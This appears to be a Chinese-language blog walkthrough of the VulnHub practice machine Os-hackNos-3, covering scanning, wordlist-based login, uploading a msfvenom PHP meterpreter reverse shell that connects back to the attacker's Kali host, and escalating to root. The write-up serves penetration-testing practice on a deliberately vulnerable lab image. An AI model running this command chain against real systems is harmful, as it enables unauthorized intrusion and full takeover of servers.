好久没做攻击实践了,今天看了一下,手里还攒着6个vulnhub的镜像,算了一下,整好春节前把它们都实践完,今天实践的是Os-hackNos-3,
用workstation导入成功,但是扫描不出来地址,换成virtualbox,
sudo netdiscover -r 192.168.56.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.104,
发现有http服务,名字叫WebSec,猜一个url,
http://192.168.56.104/websec/,下面发现个账户,
从网页内容里爬密码,
sudo cewl http://192.168.56.104/websec/ > passwd.txt,
从头开始试,到contact@hacknos.com/Securityx时成功,
再猜一个url,http://192.168.56.104/websec/admin,登录成功,
找到一个能放反弹shell的地方,
在kali攻击机上生成反弹shell代码,
sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,
把代码粘到页面上,保存提交,
在kali攻击机上开个反弹shell的监听,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.106
set LPORT 4444
run
在页面上再次点击保存,反弹shell就过来了,不是root,需要提权,
先转成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
发现个blackdevil账户,又发现可能是密码的加密数据,
去https://www.spammimic.com/spreadsheet.php?action=decode上解密,得到blackdevil的密码,Security@x@,
切换到blackdevil,发现能再直接切到root,搞定,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Os-hackNos-3的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论